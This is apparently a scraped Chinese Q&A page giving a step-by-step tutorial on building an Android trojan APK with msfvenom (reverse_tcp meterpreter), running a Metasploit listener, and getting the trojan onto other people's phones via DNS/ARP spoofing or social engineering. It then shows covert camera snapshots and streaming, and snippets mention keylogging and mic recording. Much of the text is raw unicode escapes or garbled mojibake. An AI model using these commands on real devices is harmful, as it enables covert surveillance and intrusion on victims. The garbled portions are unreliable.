msf怎么远程监控安卓手机 如何实现安卓手机的远程控制?

\u5982\u4f55\u4f7f\u7528Metasploit\u5bf9\u5b89\u5353\u624b\u673a\u8fdb\u884c\u63a7\u5236

\u6253\u5f00vm\u542f\u52a8Kalilinux\u3002\u63a5\u7740\u6253\u5f00\u7ec8\u7aef\uff0c\u4f7f\u7528msfvenom\u5236\u4f5candroid\u5229\u7528\u7a0b\u5e8f\u3002Msfvenom\u662fmsfpayload\u548cmsfencode\u7684\u7ec4\u5408\u3002\u5b83\u662f\u4e00\u4e2a\u5355\u4e00\u7684\u5de5\u5177\u3002\u5b83\u6709\u6807\u51c6\u7684\u547d\u4ee4\u884c\u9009\u9879\u3002Msfvenom\u7528\u6765\u5236\u9020\u7684\u6709\u6548\u8f7d\u8377\u7528\u6765\u6e17\u900fAndroid\u6a21\u62df\u5668\u3002\u4e00\u65e6\u6253\u5f00\u7ec8\u7aef\u63d0\u793a\u7b26\u4e0b\u8f93\u5165\u4ee5\u4e0b\u547d\u4ee4\uff0c\u4f7f\u7528msfvenom\u5de5\u5177\u6765\u521b\u5efa\u6709\u6548\u8f7d\u8377APK\u6587\u4ef6\u3002```msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.1128LPORT=4444R>/root/Desktop/pentest.apk```p\u8bbe\u7f6e\u8981\u4f7f\u7528\u7684payloadLHOST\u8bbe\u7f6e\u7528\u6765\u63a5\u6536\u53cd\u5f39\u8fde\u63a5\u7684\u4e3b\u673aLPORT\u8bbe\u7f6e\u7528\u6765\u63a5\u6536\u53cd\u5f39\u8fde\u63a5\u7684\u7aef\u53e3R\u8bbe\u7f6e\u6587\u4ef6\u683c\u5f0fLocation\u8981\u4fdd\u5b58\u7684\u6587\u4ef6\u4f4d\u7f6e\u8fd9\u4e2a\u547d\u4ee4\u6267\u884c\u5b8c\u4e4b\u540e\uff0c\u4f60\u4f1a\u770b\u5230\u4e00\u4e9b\u9519\u8bef\uff0c\u4f46\u4e0d\u7528\u62c5\u5fc3\u3002\u73b0\u5728\u53ef\u4ee5\u5230\u8f93\u51fa\u76ee\u5f55\u67e5\u770b\u751f\u6210\u7684apk\u4e86\u3002

\u8fdc\u7a0b\u63a7\u5236\u662f\u6307\u7ba1\u7406\u4eba\u5458\u5728\u5f02\u5730\u901a\u8fc7\u8ba1\u7b97\u673a\u7f51\u7edc\u5f02\u5730\u62e8\u53f7\u6216\u53cc\u65b9\u90fd\u63a5\u5165Internet\u7b49\u624b\u6bb5\uff0c\u8fde\u901a\u9700\u88ab\u63a7\u5236\u7684\u8ba1\u7b97\u673a\uff0c\u5c06\u88ab\u63a7\u8ba1\u7b97\u673a\u7684\u684c\u9762\u73af\u5883\u663e\u793a\u5230\u81ea\u5df1\u7684\u8ba1\u7b97\u673a\u4e0a\u3002

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP 

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

 

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

 webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头 



  • msf鎬庝箞杩滅▼鐩戞帶瀹夊崜鎵嬫満
    绛旓細杈撳叆鍛戒护锛msfconsole 鐒跺悗杈撳叆锛1. use exploit/multi/handler 鍔犺浇妯″潡 2. set payload android/meterpreter/reverse_tcp 閫夋嫨Payload 3.show options 鏌ョ湅鍙傛暟璁剧疆 鎴戜滑鐪嬭payload閲岃竟鏈変袱涓弬鏁拌璁剧疆 LHOST鍜孡PORT 琛ㄧず鍦板潃鍜岀鍙 榛樿鐨勭鍙f槸4444 鐜板湪鎴戜滑鏉ユ洿鏀硅缃 1.set LHOST 192.168.1.6...
  • msf寰楀埌浼氳瘽鍚庡彲浠鐩戞帶灞忓箷鍚
    绛旓細msf寰楀埌鐨勪細璇濇槸鍛戒护琛宻hell锛屽叾瀹炲姛鑳借繕鏄緢寮哄ぇ鐨勶紝鏄棤娉曠洃鎺у睆骞曠殑銆備絾鏄痺indows/meterpreter/reverse_tcp杩欎釜payload鏈塺un vnc杩欎釜鍛戒护寮鍚繙绋嬫闈紝涓嶈繃涓嶆庝箞濂界敤銆傛瘮杈冨ソ鐢ㄧ殑鏄細keyscan_start锛氬紑濮嬮敭鐩樿褰 keyscan_dump锛氫笅杞介敭鐩樿褰 keyscan_stop锛氱粨鏉熼敭鐩樿褰 record_mic锛氬綍鍒跺0闊筹紙濡傛灉鐩爣涓...
  • Kali鍒╃敤msf娓楅廤indows鐢佃剳(瓒呰缁)
    绛旓細webcam_snap 閲囧彇蹇収浠庢寚瀹氱殑鎽勫儚澶达紙鎽勫儚澶存媿鎽勪竴寮犵収鐗囷級webcam_stream 鎾斁瑙嗛娴佷粠鎸囧畾鐨勬憚鍍忓ご锛堝紑鍚憚鍍忓ご鐩戞帶锛塭numdesktops 鍒楀嚭鎵鏈夊彲璁块棶鐨勬闈㈠拰绐楀彛绔欙紙绐椾綋鍒楄〃锛塯etdesktop 寰楀埌褰撳墠鐨凪eterpreter妗岄潰 reboot 閲嶆柊鍚姩杩滅▼璁$畻鏈 shutdown 鍏抽棴杩滅▼璁$畻鏈 shell 鏀惧叆绯荤粺鍛戒护 shell enumdesktops 鍒...
  • 娓楅忔祴璇曚粈涔堟剰鎬
    绛旓細瀵规暟鎹緭鍏ャ佹暟鎹瓨鍌ㄣ佸瓨鍌ㄦ暟鎹被鍒佹暟鎹闂帶鍒躲佹晱鎰熸暟鎹姞瀵嗐佸唴瀛樻暟鎹畨鍏ㄣ佹暟鎹紶杈撱佽瘉涔﹂獙璇併杩滅▼鏁版嵁閫氫俊鍔犲瘑銆佹暟鎹紶杈撳畬鏁存с佹湰鍦版暟鎹氳瀹夊叏銆佷細璇濆畨鍏ㄣ佹暟鎹緭鍑恒佽皟璇曚俊鎭佹晱鎰熶俊鎭樉绀虹瓑杩囩▼杩涜婕忔礊妫娴,鍙戠幇鏁版嵁瀛樺偍鍜屽鐞嗚繃绋嬩腑琚潪娉曡皟鐢ㄣ佷紶杈撳拰绐冨彇婕忔礊銆 5銆佷笟鍔″畨鍏ㄦ娴嬨 瀵圭敤鎴风櫥褰,瀵嗙爜绠...
  • 本站交流只代表网友个人观点,与本站立场无关
    欢迎反馈与建议,请联系电邮
    2024© 车视网